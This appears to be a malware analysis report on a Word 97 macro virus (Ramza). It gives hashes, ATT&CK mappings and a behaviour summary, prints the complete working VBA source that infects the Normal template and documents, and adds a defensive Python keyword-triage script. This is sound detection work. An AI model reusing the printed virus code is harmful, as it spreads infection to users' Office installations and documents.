Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 813e218e64d0def4…

MALICIOUS

Office (OLE)

Size: 31.0 KB
Created: 1999-06-16 13:03:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 47bc792ab8e7c090d037417b667f7cf0
SHA-1: 0c6b56e0b890166eefbd7c8043ab8651956cb387
SHA-256: 813e218e64d0def4d6c2d51ce404fccc66d5314fa578d3c20e5ddb2aed613b9c
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1137.001 Office Application Startup: Office Template Macros (the code persists by rewriting the Normal template; no registry Run key or Startup folder is touched)
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word 8.0 (Word 97) document whose ThisDocument module carries a Document_Open and a Document_Close macro. On open, the macro uses the VBA project object model (VBProject.VBComponents.Item(1).CodeModule, i.e. the first component of each project) to read the source of whichever project, Normal template or active document, already contains the marker string "The Azmar", writes that source to c:\windows\scandisk.log, and, if the Normal template does not yet contain the marker, deletes the template's first module and reloads it from that file, then saves the template. On close it does the same to the active document and saves it, then deletes every other VBA component (index 2 upward) from both the Normal template and the document, showing a Portuguese message box per module ("Possível vírus! <module> pronto para remoção!", i.e. "Possible virus! <module> ready for removal!") titled "AntiMacro - By Pacheco", so the infection masquerades as an anti-macro utility while removing competing macros. This is a self-replicating Word macro virus: it persists through the Normal template and spreads to every document closed on the infected installation. Nothing in the extracted code downloads, drops or executes any further component; scandisk.log holds only a copy of the macro source. Every statement runs under On Error Resume Next, so on Office 2002 and later, where programmatic access to the VBA project is refused unless the user has explicitly trusted access to the VBA project object model, the macro fails silently rather than raising an error. The ClamAV detection Doc.Trojan.Ramza-1 is consistent with this behaviour.

Heuristics 3

  • ClamAV: Doc.Trojan.Ramza-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ramza-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2178 bytes
SHA-256: 39a59d6bbe3228add9c852bb7e3cae423bd28642a1776411a4a34e3158b4fab7
Detection: ClamAV Doc.Trojan.Ramza-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const Azmar = "The Azmar"
Dim Normal, Active As Object
Dim Code, Macro, Nome As String
Dim Lines As Integer
Dim Contaminado As Boolean
Private Sub Document_Open()
On Error Resume Next
Set Normal = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Active = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

If Not Active.Find(Azmar, 1, 1, 100, 100) Then
 Macro = Normal.Lines(1, Normal.CountOfLines)
 Lines = Normal.CountOfLines
Else
 Macro = Active.Lines(1, Active.CountOfLines)
 Lines = Active.CountOfLines
End If

Open "c:\windows\scandisk.log" For Output As #1
Print #1, Macro
Close #1

If Not Normal.Find(Azmar, 1, 1, 100, 100) Then
 Normal.DeleteLines 1, Lines
 Normal.AddFromFile ("c:\windows\scandisk.log")
 NormalTemplate.Save
End If

End Sub
Private Sub Document_Close()
On Error Resume Next
Set Active = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Lines = Active.CountOfLines
If Not Active.Find(Azmar, 1, 1, 100, 100) Then
 Active.DeleteLines 1, Lines
 Active.AddFromFile ("c:\windows\scandisk.log")
 ActiveDocument.Save
End If

Contaminado = False
For Code = NormalTemplate.VBProject.VBComponents.Count To 2 Step -1
 Nome = NormalTemplate.VBProject.VBComponents(Code).Name
 MsgBox "Possível vírus! " & Nome & " pronto para remoção!", , "AntiMacro - By Pacheco"
 NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(Code)
Next

If Contaminado Then
 NormalTemplate.Save
End If

Contaminado = False
For Code = ActiveDocument.VBProject.VBComponents.Count To 2 Step -1
 Nome = ActiveDocument.VBProject.VBComponents(Code).Name
 MsgBox "Possível vírus! " & Nome & " pronto para remoção!", , "AntiMacro - By Pacheco"
 ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(Code)
 Contaminado = True
Next

If Contaminado Then
 ActiveDocument.Save
End If

End Sub
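Keyword triage of the module above, as an added example that is not part of this report and not oletools' own code. It does over already-decoded VBA text what an analyst reaches for olevba's keyword summary to do, and additionally recovers the two things this family gives away in plain text: the file the macro writes its own source to, and the marker string it searches for to avoid re-infecting a module. The indicator table, the labels and the verdict rule are this example's own choices; SAMPLE_VBA is an excerpt of the macros.bas shown above, trimmed to the Document_Open handler and the module-removal loop of Document_Close.

```python
"""Keyword triage of a decoded VBA module for self-replicating (macro virus)
behaviour. Added example; not part of this report and not oletools code."""
import re

# Excerpt of the macros.bas module extracted from this sample, trimmed to the
# Document_Open handler and the module-removal loop of Document_Close.
SAMPLE_VBA = r'''Const Azmar = "The Azmar"
Dim Normal, Active As Object
Private Sub Document_Open()
On Error Resume Next
Set Normal = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Active = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Not Active.Find(Azmar, 1, 1, 100, 100) Then
 Macro = Normal.Lines(1, Normal.CountOfLines)
Else
 Macro = Active.Lines(1, Active.CountOfLines)
End If
Open "c:\windows\scandisk.log" For Output As #1
Print #1, Macro
Close #1
If Not Normal.Find(Azmar, 1, 1, 100, 100) Then
 Normal.DeleteLines 1, Lines
 Normal.AddFromFile ("c:\windows\scandisk.log")
 NormalTemplate.Save
End If
End Sub
Private Sub Document_Close()
For Code = NormalTemplate.VBProject.VBComponents.Count To 2 Step -1
 NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(Code)
Next
End Sub
'''

# (label, regex) pairs; the label set is this example's own, not an olevba list.
# VBA identifiers are case-insensitive, so every pattern is matched IGNORECASE.
INDICATORS = [
    ("auto-exec entry point",
     r"\bSub\s+(?:Document_(?:Open|Close|New)|Auto(?:Open|Close|Exec|New))\b"),
    ("VBA project object model access", r"\bVBProject\.VBComponents\b"),
    ("reads module source (CodeModule.Lines)", r"\.Lines\s*\("),
    ("writes a file", r"\bOpen\s+\"[^\"]+\"\s+For\s+(?:Output|Append)\b"),
    ("imports source into a project", r"\.AddFromFile\b"),
    ("saves the Normal template", r"\bNormalTemplate\.Save\b"),
    ("deletes VBA components", r"\.VBComponents\.Remove\b"),
    ("suppresses errors", r"\bOn\s+Error\s+Resume\s+Next\b"),
]

# Present together, these mean the macro copies its own source into another project.
REPLICATION_SET = {"VBA project object model access",
                   "reads module source (CodeModule.Lines)",
                   "imports source into a project"}


def matched_indicators(vba_source):
    """Labels of every indicator found in the source, in INDICATORS order."""
    return [label for label, pattern in INDICATORS
            if re.search(pattern, vba_source, re.IGNORECASE)]


def dropped_file_paths(vba_source):
    """Paths the macro writes with Open ... For Output/Append."""
    return re.findall(r"\bOpen\s+\"([^\"]+)\"\s+For\s+(?:Output|Append)\b",
                      vba_source, re.IGNORECASE)


def infection_marker(vba_source):
    """Recover the string the macro looks for to avoid re-infecting a module:
    a Const holding a string literal that is later passed to CodeModule.Find()."""
    consts = re.findall(r"\bConst\s+(\w+)\s*=\s*\"([^\"]*)\"", vba_source, re.IGNORECASE)
    for name, literal in consts:
        if re.search(rf"\.Find\s*\(\s*{re.escape(name)}\b", vba_source, re.IGNORECASE):
            return literal
    return None


def triage(vba_source):
    """Indicators, dropped files, infection marker and a one-line verdict."""
    hits = matched_indicators(vba_source)
    verdict = ("self-replicating macro (macro virus)"
               if REPLICATION_SET.issubset(hits) else "no self-replication seen")
    return {"indicators": hits,
            "dropped_files": dropped_file_paths(vba_source),
            "infection_marker": infection_marker(vba_source),
            "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key:<17} {value}")
```

Run it on the output of olevba's macro extraction (or on any decoded .bas file) to get the indicator list, the written path and the marker. The verdict deliberately keys on the three calls that together constitute self-replication (project object model access, reading a module's lines, importing source into a module) rather than on any one keyword, because each of those calls also appears in legitimate add-in tooling; an auto-exec entry point or a file write on its own is not enough to call a module a virus.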